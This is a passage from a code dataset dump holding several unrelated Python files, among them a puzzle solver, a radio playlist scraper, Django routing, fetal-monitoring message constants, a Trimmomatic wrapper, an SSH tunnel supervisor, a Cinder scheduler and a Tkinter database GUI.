(min_color-1):\n return\n\n if index >= max_index:\n return\n\n cur = List[index]\n\n cur_color_num = lst_check[cur]\n\n if color[cur_color_num] < 5:\n if visit_check(cur):\n for i,j in cur:\n visit[i][j] = 1\n color[cur_color_num] += 1\n dfs(index+1,count+1)\n color[cur_color_num] -= 1\n for i,j in cur:\n visit[i][j] = 0\n\n if count == (min_color-2):\n return\n\n dfs(index+1,count)\n\n\ndfs(index,0)\n\"\"\"\n\nif Ans == 10000:\n print(-1)\nelse:\n print(Ans)\n","sub_path":"색종이 붙이기2.py","file_name":"색종이 
붙이기2.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"148171410","text":"import urllib.request\nfrom bs4 import BeautifulSoup\n\nnetworks = {\n    'DI.fm': ('http://www.di.fm/', 'http://listen.di.fm/public3{0}.pls'),\n    'Jazzradio.com': ('http://www.jazzradio.com/',\n                      'http://listen.jazzradio.com/public1{0}.pls'),\n    'RadioTunes': ('http://www.radiotunes.com/',\n                   'http://listen.radiotunes.com/public1{0}.pls')\n}\nselector = 'div.lists ul li a'\n\nfor n in networks:\n    print(n, '...')\n    raw = urllib.request.urlopen(networks[n][0]).read()\n    soup = BeautifulSoup(raw, 'html.parser')\n\n    # collect one playlist URL per channel link found on the network's page\n    links = []\n    streams = soup.select(selector)\n    for s in streams:\n        links.append(networks[n][1].format(s.attrs['href']))\n\n    with open('{0}.txt'.format(n), 'w') as f:\n        f.write('\\n'.join(links))","sub_path":"radioscrape.py","file_name":"radioscrape.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"228733113","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\n\nurlpatterns = [\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^aluno/', include('aluno.urls', namespace='aluno')),\n url(r'^candidato/', include('candidato.urls', namespace='candidato')),\n url(r'^coordenador/', include('coordenador.urls', namespace='coordenador')),\n url(r'^professor/', include('professor.urls', namespace='professor')),\n url(r'^usuarios_fbv/', include('usuarios_fbv.urls', namespace='usuarios_fbv')),\n url(r'^usuarios_fbv_user/', include('usuarios_fbv_user.urls', namespace='usuarios_fbv_user')),\n url(r'^$', 'apps.views.home'),\n]\n","sub_path":"apps/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
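
With the namespaces declared above, views in the included apps are reversed as `'namespace:name'`. A sketch for this Django 1.x style of configuration (the `'index'` URL name is hypothetical and would have to exist inside `aluno/urls.py`):

```python
from django.core.urlresolvers import reverse  # relocated to django.urls in Django 2.0

path = reverse('aluno:index')  # resolves a name inside the 'aluno' namespace above
```
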
+{"seq_id":"413626352","text":"# coding: utf-8\n\n#\n# Copyright Douglas Williams, 2018\n# All Rights Reserved\n#\n\n#\n# Messages\n#\n\n# Enumeration of messages\nDIAG_CHECK_MONITOR = 'DIAG_CHECK_MONITOR'\nDIAG_NORMAL = 'DIAG_NORMAL'\nDIAG_TACHYCARDIA = 'DIAG_TACHYCARDIA'\nDIAG_BRADYCARDIA = 'DIAG_BRADYCARDIA'\nDIAG_SEVERE_BRADYCARDIA = 'DIAG_SEVERE_BRADYCARDIA'\nDIAG_FHRV_MARKED = 'DIAG_FHRV_MARKED'\nDIAG_FHRV_LOW = 'DIAG_FHRV_LOW'\n\nDIAG_MARKED_PROLONGED = 'DIAG_MARKED_PROLONGED'\nDIAG_LONG_PROLONGED = 'DIAG_LONG_PROLONGED'\nDIAG_PROLONGED = 'DIAG_PROLONGED'\n\nDIAG_REPETITIVE_LATE_DECEL_LOW_VAR = 'DIAG_REPETITIVE_LATE_DECEL_LOW_VAR'\nDIAG_REPETITIVE_LATE_DECEL = 'DIAG_REPETITIVE_LATE_DECEL'\nDIAG_LATE_DECEL = 'DIAG_LATE_DECEL'\n\nDIAG_REPETITIVE_PERIODIC_VARIABLE = 'DIAG_REPETITIVE_PERIODIC_VARIABLE'\n\nDIAG_ACCEL_MISSING = 'DIAG_ACCEL_MISSING'\nDIAG_TACHYSYSTOLE = 'DIAG_TACHYSYSTOLE'\nDIAG_NO_CONTRACTIONS = 'DIAG_NO_CONTRACTIONS'\n\n\n\n# Diagnostic messages for IA\nDIAG_CONTINUE_IA = 'DIAG_CONTINUE_IA'\nDIAG_COMPLETE_IA = 'DIAG_COMPLETE_IA'\n\n\n\n# DIAG_PLACENTAL_INSUFFICIENCY = 'DIAG_PLACENTAL_INSUFFICIENCY'\n# DIAG_ABRUPTION = 'DIAG_ABRUPTION'\n#\n# DIAG_CORD_COMPRESSION = 'DIAG_CORD_COMPRESSION'\n#\n# DIAG_OBSTRUCTED_LABOR = 'DIAG_OBSTRUCTED_LABOR'\n\n\n\n# Message details\nALL_DIAGNOSTIC_MESSAGES = {\n    DIAG_CHECK_MONITOR: {'text': 'No recent updates from patient monitor', 'order': 1},\n    DIAG_NORMAL: {'text': 'Normal for this fetus', 'order': 1},\n    DIAG_TACHYCARDIA: {'text': 'Tachycardia: Fetal heart rate above 160', 'order': 2},\n    DIAG_BRADYCARDIA: {'text': 'Bradycardia: Fetal heart rate below 110', 'order': 2},\n    DIAG_SEVERE_BRADYCARDIA: {'text': 'Severe Bradycardia: Fetal heart rate below 100', 'order': 3},\n\n    DIAG_FHRV_MARKED: {'text': 'Marked fetal heart rate variability for over 30 min', 'order': 2},\n    DIAG_FHRV_LOW: {'text': 'Low fetal heart rate variability for over 50 min', 'order': 2},\n\n    DIAG_MARKED_PROLONGED: {'text': 'URGENT: Prolonged Deceleration with severe bradycardia', 'order': 4},\n    DIAG_LONG_PROLONGED: {'text': 'Prolonged Deceleration over 5 min', 'order': 3},\n    DIAG_PROLONGED: {'text': 'Prolonged Deceleration present', 'order': 2},\n\n    DIAG_REPETITIVE_LATE_DECEL: {'text': 'Repetitive Late Decelerations', 'order': 3},\n    DIAG_REPETITIVE_LATE_DECEL_LOW_VAR: {'text': 'Repetitive Late Decelerations with low variability', 'order': 4},\n    DIAG_LATE_DECEL: {'text': 'Late Decelerations present', 'order': 2},\n\n    DIAG_REPETITIVE_PERIODIC_VARIABLE: {'text': 'Repetitive Variable Decelerations', 'order': 3},\n\n    DIAG_ACCEL_MISSING: {'text': 'Accelerations absent for over 50 min', 'order': 2},\n\n    DIAG_TACHYSYSTOLE: {'text': 'Tachysystole: Contraction rate > 5 per 10 min', 'order': 2},\n    DIAG_NO_CONTRACTIONS: {'text': 'No recent contractions', 'order': 2},\n\n    DIAG_CONTINUE_IA: {'text': 'Continue monitoring of patient', 'order': 1},\n    DIAG_COMPLETE_IA: {'text': 'IA Testing Complete', 'order': 1},\n\n    # DIAG_PLACENTAL_INSUFFICIENCY: {'text': 'Placental insufficiency', 'order': 1},\n    # DIAG_ABRUPTION: {'text': 'Abruption', 'order': 2},\n    # DIAG_CORD_COMPRESSION: {'text': 'Potential cord compression', 'order': 2},\n}\n\n","sub_path":"LowCostCTG_Development/rules_message_digest.py","file_name":"rules_message_digest.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
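
The `'order'` field in the record above reads as a severity rank (1 = informational, 4 = urgent), so a plausible consumer surfaces the highest-ranked active diagnosis. A sketch; the `most_urgent` helper is illustrative, not part of this module:

```python
def most_urgent(diagnoses):
    # highest 'order' wins; ties resolve arbitrarily
    return max(diagnoses, key=lambda d: ALL_DIAGNOSTIC_MESSAGES[d]['order'])

active = [DIAG_TACHYCARDIA, DIAG_MARKED_PROLONGED, DIAG_NORMAL]
print(ALL_DIAGNOSTIC_MESSAGES[most_urgent(active)]['text'])
# -> URGENT: Prolonged Deceleration with severe bradycardia
```
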
+{"seq_id":"650375892","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 14 09:29:23 2017\r\n\r\n@author: Eric\r\n\"\"\"\r\n\r\n## read csv file containing SRR numbers, one per line\r\nimport sys\r\nfrom subprocess import call\r\nfrom csv import reader\r\nfrom contextlib import contextmanager\r\nimport os\r\n\r\n@contextmanager\r\ndef cd(newdir):\r\n prevdir = os.getcwd()\r\n os.chdir(os.path.expanduser(newdir))\r\n try:\r\n yield\r\n finally:\r\n os.chdir(prevdir)\r\n## loop through the csv file and call trimmomatic on each one\r\n\r\ndef makeConfigFile(direct):\r\n with cd(direct):\r\n call('ls *.fastq.gz > filenames.csv', shell=True)\r\n\r\ndef Trim():\r\n assert (len(sys.argv)==3),\"Usage: PreProcess.py fastq_file_path adapters_to_clip.fa \\\r\n This script takes the three arguments listed above. Clipping is done with trimmomatic, \\\r\n the .jar of trimmomatic and adapter fasta must be in the same directory as this script. \\\r\n Output will be sent to Trim_output directory, which will be a sub-directory of the current working directory. \\\r\n If any Trimmomatic params must be modified, it should be modifies directly from the source code. \\\r\n Defaults are currently: paired-end, phred33, sliding window of 4 with min quality of 20. \\\r\n Please do not enter full path to adapter file\"\r\n script = sys.argv[0]\r\n file_path = str(sys.argv[1])\r\n \r\n makeConfigFile(file_path)\r\n files = file_path+\"\\\\filenames.csv\"\r\n\r\n adapt_file = str(sys.argv[2])\r\n\r\n csv_reader = reader(open(files,\"r\"), quotechar=\"\\\"\")\r\n\r\n list_files =[]\r\n for row in csv_reader:\r\n list_files.append(row)\r\n\r\n list_files.sort\r\n\r\n \r\n call(['mkdir', 'Trim_output'])\r\n with cd(\"Trim_output\"): \r\n x=0\r\n while x[0-9]+)')\n\n def log_message(self, format, *args):\n return\n\n def send_headers(self, content_type):\n self.send_response(200)\n self.send_header('Content-type', content_type)\n self.end_headers()\n \n \n def get_id(self):\n match = self.rx_id.match(self.path)\n if match is None:\n logging.debug(\"enabled request without id {}\".format(self.path))\n self.wfile.write(b'{}')\n return None\n\n th_id = int(match.group(1))\n if th_id not in self.thrs:\n logging.debug(\"id {} not found in threads\".format(self.path))\n self.wfile.write(b'{}')\n return None\n return th_id\n \n\n def get_content_type(self, filename):\n p, ext = os.path.splitext(filename)\n ext = ext.lower()\n if ext == \".html\":\n return \"text/html\"\n elif ext == \".js\":\n return \"text/javascript\"\n elif ext == \".svg\":\n return \"image/svg+xml\"\n elif ext == \".jpg\" or ext == \".jpeg\":\n return \"image/jpeg\"\n elif ext == \".png\":\n return \"image/png\"\n elif ext == \".ico\":\n return \"image/x-icon\"\n else:\n return \"text/plain\"\n \n \n def do_GET(self):\n if self.path == '/list':\n self.send_headers(\"application/json\")\n text = '['\n for tun_id in self.thrs:\n tun = self.thrs[tun_id]\n text += '{'\n text += '\"id\":\"{}\",'.format(tun['id'])\n text += '\"name\":\"{}\",'.format(tun['name'])\n text += '\"note\":\"{}\",'.format(tun['note'])\n if tun['enabled'] == True:\n text += '\"enabled\": true,'\n else:\n text += '\"enabled\": false,'\n if ping(tun['local_port']):\n text += '\"status\": true,'\n else:\n text += '\"status\": false,'\n text += '\"cmd\":\"{}\",'.format(tun['cmd'])\n text += '\"local_port\":\"{}\",'.format(tun['local_port'])\n text += '\"url\":\"{}\",'.format(tun['url'])\n text += '\"num\":\"{}\"'.format(tun['num'])\n text += '},'\n text = text[:-1] + ']'\n 
self.wfile.write(bytes(text, 'utf8'))\n return\n\n elif self.path.startswith('/enabled'):\n self.send_headers(\"application/json\")\n th_id = self.get_id()\n if th_id is not None:\n enabled = self.thrs[th_id]['enabled']\n self.wfile.write(\n bytes('{' + '\"enabled\": {}'.format(enabled) + '}', 'utf8'))\n return\n \n elif self.path.startswith('/status'):\n self.send_headers(\"application/json\")\n th_id = self.get_id()\n if th_id is not None:\n port = self.thrs[th_id]['local_port']\n is_on = ping(port)\n self.wfile.write(bytes('{' + '\"on\": {}'.format(is_on) + '}', 'utf8'))\n return\n \n elif self.path.startswith('/switch'):\n self.send_headers(\"application/json\")\n th_id = self.get_id()\n if th_id is not None:\n if self.thrs[th_id]['enabled']:\n self.thrs[th_id]['enabled'] = False\n else:\n self.thrs[th_id]['enabled'] = True\n \n self.wfile.write(\n bytes('{' + '\"enabled\": {}'.format(self.thrs[th_id]['enabled']) + '}', 'utf8'))\n return\n else:\n if self.path == '/':\n #self.send_headers(\"text/html\")\n filename = self.root_templates + '/index.html'\n else:\n filename = self.root_templates + self.path\n if os.path.exists(filename):\n content_type = self.get_content_type(filename)\n self.send_headers(content_type)\n if content_type.startswith('image'):\n with open(filename, 'rb') as fh:\n self.wfile.write(fh.read())\n else:\n with open(filename, 'r') as fh:\n self.wfile.write(bytes(fh.read(), 'utf8'))\n \n\ndef run_http(thrs, port):\n StatusHTTPRequestHandler.thrs = thrs\n httpd = HTTPServer(('localhost', port), StatusHTTPRequestHandler)\n logging.debug('listen server localhost:{}'.format(port))\n print('open: http://localhost:{}'.format(port))\n httpd.serve_forever()\n\n\ndef threads_loop(thrs, max_death_count, timeout):\n death_count = 0\n max_death_count = len(thrs) * max_death_count\n while True:\n for tun_id in thrs:\n logging.debug(thrs)\n if thrs[tun_id]['enabled']:\n # ping\n logger.debug('thread {} enabled: {}, obj: {}'.format(\n tun_id, thrs[tun_id]['enabled'], thrs[tun_id]))\n if not ping(thrs[tun_id]['local_port']):\n logger.debug('thread cycle - enabled')\n if thrs[tun_id]['process'] is not None:\n thrs[tun_id]['process'].terminate()\n death_count += 1\n else:\n death_count = 0\n\n # restart or start\n if thrs[tun_id]['process'] is None or not thrs[tun_id]['process'].is_alive():\n thrs[tun_id]['process'], thrs[tun_id]['pid'] = start_process(\n thrs[tun_id]['cmd'].split(' '))\n logger.debug('started process: {}'.format(\n thrs[tun_id]['name']))\n else:\n # not enabled - terminate\n logger.debug('thread {} enabled: {}, obj: {}'.format(\n tun_id, thrs[tun_id]['enabled'], thrs[tun_id]))\n if thrs[tun_id]['process'] is not None and thrs[tun_id]['process'].is_alive():\n logger.debug('thread cycle - not enabled')\n logger.debug('terminate: {}'.format(thrs[tun_id]))\n pid = thrs[tun_id]['pid']\n os.kill(pid, signal.SIGTERM)\n thrs[tun_id]['process'].terminate()\n logger.debug('process {} stoped, pid: {}'.format(\n thrs[tun_id]['name'], pid))\n thrs[tun_id]['num'] += 1\n\n if death_count >= max_death_count:\n logger.info('exceeded death count!')\n return -1\n time.sleep(SLEEP)\n\ndef print_help():\n print(\"usage:\")\n print(\" {} - for run with default config\".format(sys.argv[0]))\n print(\" {} [path-to-config-file] - for run with custom config\".format(sys.argv[0]))\n print(\" {} [-h|--help] - print this help\".format(sys.argv[0]))\n\n\ndef main():\n \"\"\"\n Enter point\n :return:\n \"\"\"\n port = 8000\n os.makedirs('logs', exist_ok=True)\n tun_id = 0\n threads = {}\n if 
len(sys.argv) >= 2:\n if sys.argv[1].lower() == '-h' or sys.argv[1].lower() == '--h':\n print_help()\n return 0\n else:\n jconf = load_configs(sys.argv[1])\n else:\n jconf = load_configs()\n \n port = int(jconf.get('ui_port', 8000))\n max_death_count = int(jconf.get('max_death_count', 5))\n timeout = int(jconf.get('timeout', 3))\n loging_conf = jconf['logging_conf']\n logging.config.dictConfig(loging_conf)\n \n \n tunns = get_tunnels(jconf)\n for tunnel in tunns:\n if tunnel['enabled']:\n tunnel['process'], tunnel['pid'] = start_process(\n tunnel['cmd'].split(' '))\n else:\n tunnel['process'] = None\n threads[tun_id] = tunnel\n tun_id += 1\n\n th_http = Thread(target=run_http, args=(threads, port))\n th_http.start()\n time.sleep(1)\n threads_loop(threads, max_death_count, timeout)\n\nif __name__ == '__main__':\n main()\n","sub_path":"tunns.py","file_name":"tunns.py","file_ext":"py","file_size_in_byte":10188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
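
The tunnel-supervision loop above leans on a `ping(port)` helper whose definition falls in the part of the file not shown here. A typical localhost port-liveness check it could correspond to (an assumption, not the file's actual implementation):

```python
import socket

def ping(port, host='localhost', timeout=1.0):
    """Return True if something accepts TCP connections on host:port."""
    try:
        with socket.create_connection((host, int(port)), timeout=timeout):
            return True
    except OSError:  # refused, unreachable, or timed out
        return False
```
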
+{"seq_id":"592560850","text":"# Copyright (c) 2010 OpenStack Foundation\n# Copyright 2010 United States Government as represented by the\n# Administrator of the National Aeronautics and Space Administration.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nChance (Random) Scheduler implementation\n\"\"\"\n\nimport random\n\nfrom oslo.config import cfg\n\nfrom cinder import exception\nfrom cinder.scheduler import driver\n\n\nCONF = cfg.CONF\n\n\nclass ChanceScheduler(driver.Scheduler):\n \"\"\"Implements Scheduler as a random node selector.\"\"\"\n\n def _filter_hosts(self, request_spec, hosts, **kwargs):\n \"\"\"Filter a list of hosts based on request_spec.\"\"\"\n\n filter_properties = kwargs.get('filter_properties', {})\n if not filter_properties:\n filter_properties = {}\n ignore_hosts = filter_properties.get('ignore_hosts', [])\n hosts = [host for host in hosts if host not in ignore_hosts]\n return hosts\n\n def _get_weighted_candidates(self, context, topic, request_spec, **kwargs):\n \"\"\"Returns a list of the available hosts.\"\"\"\n\n elevated = context.elevated()\n hosts = self.hosts_up(elevated, topic)\n if not hosts:\n msg = _(\"Is the appropriate service running?\")\n raise exception.NoValidHost(reason=msg)\n\n return self._filter_hosts(request_spec, hosts, **kwargs)\n\n def _choose_host_from_list(self, hosts):\n return hosts[int(random.random() * len(hosts))]\n\n def _schedule(self, context, topic, request_spec, **kwargs):\n \"\"\"Picks a host that is up at random.\"\"\"\n hosts = self._get_weighted_candidates(context, topic,\n request_spec, **kwargs)\n if not hosts:\n msg = _(\"Could not find another host\")\n raise exception.NoValidHost(reason=msg)\n return self._choose_host_from_list(hosts)\n\n def schedule_create_volume(self, context, request_spec, filter_properties):\n \"\"\"Picks a host that is up at random.\"\"\"\n topic = CONF.volume_topic\n host = self._schedule(context, topic, request_spec,\n filter_properties=filter_properties)\n volume_id = request_spec['volume_id']\n snapshot_id = request_spec['snapshot_id']\n image_id = request_spec['image_id']\n\n updated_volume = driver.volume_update_db(context, volume_id, host)\n self.volume_rpcapi.create_volume(context, updated_volume, host,\n request_spec, filter_properties,\n snapshot_id=snapshot_id,\n image_id=image_id)\n\n def host_passes_filters(self, context, host, request_spec,\n filter_properties):\n \"\"\"Check if the specified host passes the filters.\"\"\"\n weighed_hosts = self._get_weighted_candidates(\n context,\n CONF.volume_topic,\n request_spec,\n filter_properties=filter_properties)\n\n for weighed_host in weighed_hosts:\n if weighed_host == host:\n elevated = context.elevated()\n host_states = self.host_manager.get_all_host_states(elevated)\n for host_state in host_states:\n if host_state.host == host:\n return host_state\n\n msg = (_('cannot place volume %(id)s on %(host)s')\n % {'id': request_spec['volume_id'], 'host': host})\n raise exception.NoValidHost(reason=msg)\n\n 
def find_retype_host(self, context, request_spec, filter_properties,\n migration_policy='never'):\n \"\"\"Find a host that can accept the volume with its new type.\"\"\"\n current_host = request_spec['volume_properties']['host']\n\n # The volume already exists on this host, and so we shouldn't check if\n # it can accept the volume again.\n filter_properties['vol_exists_on'] = current_host\n\n weighed_hosts = self._get_weighted_candidates(\n context,\n CONF.volume_topic,\n request_spec,\n filter_properties=filter_properties)\n if not weighed_hosts:\n msg = (_('No valid hosts for volume %(id)s with type %(type)s')\n % {'id': request_spec['volume_id'],\n 'type': request_spec['volume_type']})\n raise exception.NoValidHost(reason=msg)\n\n target_host = None\n for weighed_host in weighed_hosts:\n if weighed_host == current_host:\n target_host = current_host\n\n if migration_policy == 'never' and target_host is None:\n msg = (_('Current host not valid for volume %(id)s with type '\n '%(type)s, migration not allowed')\n % {'id': request_spec['volume_id'],\n 'type': request_spec['volume_type']})\n raise exception.NoValidHost(reason=msg)\n\n if not target_host:\n target_host = self._choose_host_from_list(weighed_hosts)\n\n elevated = context.elevated()\n host_states = self.host_manager.get_all_host_states(elevated)\n for host_state in host_states:\n if host_state.host == target_host:\n return (host_state, migration_policy)\n\n # NOTE(avishay):We should never get here, but raise just in case\n msg = (_('No host_state for selected host %s') % target_host)\n raise exception.NoValidHost(reason=msg)\n","sub_path":"cinder/scheduler/chance.py","file_name":"chance.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
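
`_choose_host_from_list` above draws a uniform random element by scaling `random.random()`; because `random.random()` is strictly below 1.0, the computed index always stays in range. For non-empty lists this is behaviorally equivalent to the idiomatic form:

```python
import random

def _choose_host_from_list(self, hosts):
    # same uniform selection; raises IndexError on an empty list, as indexing would
    return random.choice(hosts)
```
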
+{"seq_id":"619909850","text":"from database_class import *\nfrom nameparser_class import *\nfrom Tkconstants import *\nfrom PIL import ImageTk, Image\nimport Tkinter,sys,ttk,time,datetime,tkMessageBox,tkFileDialog,decimal,traceback\n\nclass Form:\n\n #konstruktor za formu\n def __init__(self,root):\n self.now = datetime.datetime.now()\n #iniciramo novi prozor\n self.form = Tkinter.Toplevel(root,relief=RIDGE,borderwidth=2)\n self.form.attributes('-topmost',1)\n\n #dizajn forme\n def createForm(self,tableName,refreshParent,parent,instance):\n #iniciramo pomocne varijable\n row_pos = 0\n field = dict()\n btn_rows = dict()\n values = []\n InputColumns = list(set(db.getTableColumns(tableName))-set(db.getForeignKeys(tableName))-set(db.getCounterColumns(tableName)))\n \n #stupci koji nisu counter ni fk, za njih radimo text field\n for column in InputColumns:\n label = Tkinter.Label(self.form,text=column,font=('Calibri New',12))\n label.grid(row=row_pos,sticky=W,padx=2)\n \n #za nas postoji specijalan slucaj oko vremena posudbe i vrste opreme\n if column=='vrsta' and tableName=='oprema':\n vrsta = ttk.Combobox(self.form,width=52)\n vrsta['values']=['audio','video','ostalo']\n field.update({str(column): vrsta})\n elif column=='vrijeme' and tableName=='posudba':\n vrijeme = Tkinter.Entry(self.form,width=30,font='Helvetica 14')\n vrijeme.insert(0,str(self.now.day)+'.'+str(self.now.month)+'.'+str(self.now.year)+'.')\n vrijeme.configure(state='readonly')\n field.update({str(column): vrijeme})\n else:\n field.update({str(column): Tkinter.Entry(self.form,width=30,font='Helvetica 14')})\n field[str(column)].grid(row=row_pos,column=1)\n row_pos += 1\n\n #stupci koji su counter se ne prikazuju, a fk je listbox\n for keys in db.getForeignKeys(tableName):\n label = Tkinter.Label(self.form,text=keys,font=('Calibri New',12))\n label.grid(row=row_pos,sticky=W,padx=2)\n\n #spremi row_pos od fk za gumbic kasnije\n if 'clan' in keys:\n btn_rows.update({'clan':row_pos})\n elif 'koncert' in keys:\n btn_rows.update({'konc':row_pos})\n elif 'oprema' in keys:\n btn_rows.update({'oprema':row_pos})\n \n #kreiramo listbox\n fbox = ttk.Combobox(self.form,width=52)\n fbox['values'] = db.getColumnContents(db.getReferencedTable(tableName,keys),db.getVarchars(db.getReferencedTable(tableName,keys)),True)\n field.update({str(keys): fbox})\n field[str(keys)].current(0)\n field[str(keys)].grid(row=row_pos,column=1)\n InputColumns.append(keys)\n row_pos += 1\n\n #treci stupac s gumbicima za dodavanje u pomocne tablice\n if tableName=='posudba':\n self.clan = Tkinter.Button(self.form,text='Dodaj novog člana'.decode('windows-1250'),width=15,height=1,command=lambda:Form(self.form).createForm('clan',True,'posudba',self))\n self.oprema = Tkinter.Button(self.form,text='Dodaj novu opremu',width=15,height=1,command=lambda:Form(self.form).createForm('oprema',True,'posudba',self))\n self.clan.grid(row=btn_rows['clan'],column=2,padx=5,pady=2)\n self.oprema.grid(row=btn_rows['oprema'],column=2,padx=5,pady=2)\n elif tableName=='organizira':\n self.clan = Tkinter.Button(self.form,text='Dodaj novog člana'.decode('windows-1250'),width=15,height=1,command=lambda:Form(self.form).createForm('clan',True,'organizira',self))\n self.koncert = Tkinter.Button(self.form,text='Dodaj novi koncert',width=15,height=1,command=lambda:Form(self.form).createForm('koncert',True,'organizira',self))\n self.clan.grid(row=btn_rows['clan'],column=2,padx=2,pady=2)\n self.koncert.grid(row=btn_rows['konc'],column=2,padx=2,pady=2)\n\n #iniciranje gumbica\n Next = 
Tkinter.Button(self.form,text='>',command=lambda:db.insertRecord(tableName,field,True,parent,self,None))\n if refreshParent:\n OK = Tkinter.Button(self.form,text='OK',width=15,command=lambda:db.insertRecord(tableName,field,False,parent,self,instance))\n else:\n OK = Tkinter.Button(self.form,text='OK',width=15,command=lambda:db.insertRecord(tableName,field,False,parent,self,None))\n Cancel = Tkinter.Button(self.form,text='Cancel',width=15,command=lambda:self.form.destroy())\n\n #pozicioniranje gumbica\n Next.grid(row=row_pos,column=2,pady=5,padx=5)\n OK.grid(row=row_pos,column=1)\n Cancel.grid(row=row_pos,column=0)\n\nclass Table:\n\n #konstruktor za novi prozor i scrollbar\n def __init__(self,root):\n self.window = Tkinter.Toplevel(root,relief=RIDGE,borderwidth=2)\n self.window.attributes('-topmost',1)\n self.yscrollbar = Tkinter.Scrollbar(self.window)\n self.yscrollbar.pack(side=RIGHT,fill=Y)\n self.xscrollbar = Tkinter.Scrollbar(self.window,orient=HORIZONTAL)\n self.xscrollbar.pack(side=BOTTOM,fill=X)\n\n #metoda koja inicira listu s podacima\n def openTable(self,tableName):\n self.table = Tkinter.Text(self.window,wrap=NONE,tabs='8c',xscrollcommand=self.xscrollbar.set,yscrollcommand=self.yscrollbar.set,width=100,font=('Calibri New', 10),padx=10)\n if tableName=='oprema': records = db.specialReport()\n else: records = db.prepareRecords(tableName)\n #broj crtica\n l=0\n for element in db.getTableColumns(tableName): l+=len(element)\n l=(40*(len(db.getTableColumns(tableName))-1)+l+30)\n\n #smjesti prikupljene podatke iz liste na GUI\n for row in records:\n #prvo predivna crta4\n for i in range(0,l): self.table.insert(END,'_')\n self.table.insert(END,'\\n')\n self.table.insert(END,'\\n')\n\n #pa onda podaci\n for element in row:\n if element in db.getTableColumns(tableName):\n self.table.insert(END,NameParser().parse(element))\n else:\n self.table.insert(END,unicode(element))#decode('windows-1250'))\n self.table.insert(END,'\\t')\n self.table.insert(END,'\\n')\n #i za kraj crta\n for i in range(0,l): self.table.insert(END,'_')\n self.table.pack(side=LEFT,fill=BOTH,expand=YES)\n self.yscrollbar.config(command=self.table.yview)\n self.xscrollbar.config(command=self.table.xview)\n\nclass List:\n\n #konstruktor za iniciranje prozora\n def __init__(self,root):\n self.root = root\n self.window = Tkinter.Toplevel(self.root)\n self.window.attributes('-topmost',1)\n\n #metoda koja otvara formu za azuriranje odabrane celije\n def editField(self,w,index):\n #trigger za posudba vrijeme\n if self.table=='posudba' and w.get(0)=='vrijeme':\n tkMessageBox.showerror('Neuspjeh!','Vrijeme se ne moze promijeniti!')\n return\n\n #inicira formu za azuriranje\n self.edit = Tkinter.Toplevel(self.window)\n self.edit.attributes('-topmost',1)\n\n label = Tkinter.Label(self.edit,text='Unesite novu vrijednost: ',font=('Calibri New',12))\n label.grid(row=0,column=0)\n\n colName = NameParser().deparse(w.get(0))\n #vanjski kljucevi moraju biti dropdown, a inace je text field\n if colName in db.getForeignKeys(self.table):\n field = ttk.Combobox(self.edit,width=52)\n refTable = db.getReferencedTable(self.table,colName)\n field['values'] = db.getColumnContents(refTable,db.getVarchars(refTable),True)\n else:\n field = Tkinter.Entry(self.edit,width=30,font='Helvetica 14')\n field.grid(row=0,column=1)\n\n #gumbici\n OK = Tkinter.Button(self.edit,text='OK',width=15,command=lambda:db.updateRow(self.table,colName,field.get().split(', ')[0],self.boxes,index,self))\n OK.grid(row=1,column=1)\n Cancel = 
Tkinter.Button(self.edit,text='Cancel',width=15,command=lambda:self.edit.destroy())\n Cancel.grid(row=1,column=0)\n\n #brisanje odabranog retka\n def removeField(self,w,index):\n question = 'Potvrdite brisanje zapisa '\n for i in self.boxes:\n question += i.get(index)+', '\n question = question[:-2]\n if tkMessageBox.askyesno('Brisanje zapisa',question):\n db.deleteRow(self.table,self.boxes,index,self)\n \n #izvuci GUI element i index selektirane celije\n def getSelection(self,event):\n if not self.destructive:\n self.editField(event.widget,int(event.widget.curselection()[0]))\n else:\n self.removeField(event.widget,int(event.widget.curselection()[0]))\n \n #metoda za scrollanje\n def moveList(self, *args):\n for b in self.boxes:\n b.yview(*args)\n\n #baca staru listu\n def dropList(self):\n for b in self.boxes:\n b.pack_forget()\n self.scroll.pack_forget()\n\n #kreiranje liste\n def createList(self,tableName,destructive):\n self.table = tableName\n self.destructive = destructive\n self.boxes=[]\n self.scroll = Tkinter.Scrollbar(self.window,orient='vertical',command=self.moveList)\n self.scroll.pack(side=RIGHT,fill=Y)\n self.table = tableName\n records = db.prepareRecords(tableName)\n\n #za svaki atribut i njegove podatke kreira se posebni listbox\n k=0\n for row in records[0]:\n temp = Tkinter.Listbox(self.window,width=25,height=15)\n temp.bind('<>', self.getSelection)\n counter=0\n for element in records:\n if records[counter][k] in db.getTableColumns(tableName):\n temp.insert(END,NameParser().parse(records[counter][k]))\n else:\n temp.insert(END,records[counter][k])\n counter+=1\n self.boxes.append(temp)\n k+=1\n temp.pack(side=LEFT,fill=BOTH,expand=YES) \n \nclass TkApp:\n\n #konstruktor za iniciranje korijena\n def __init__(self):\n self.root = Tkinter.Tk()\n self.root.wm_title(\"Udruga\")\n\n def callDB(self):\n tkMessageBox.showinfo(title=\"Odabir datoteke\",message=\"Prije ulaska odaberite MS Access datoteku.\",parent=self.root)\n return tkFileDialog.askopenfilename(parent=self.root)\n\n #inicira aplikaciju\n def start(self):\n #iniciraj prozor\n self.frame = 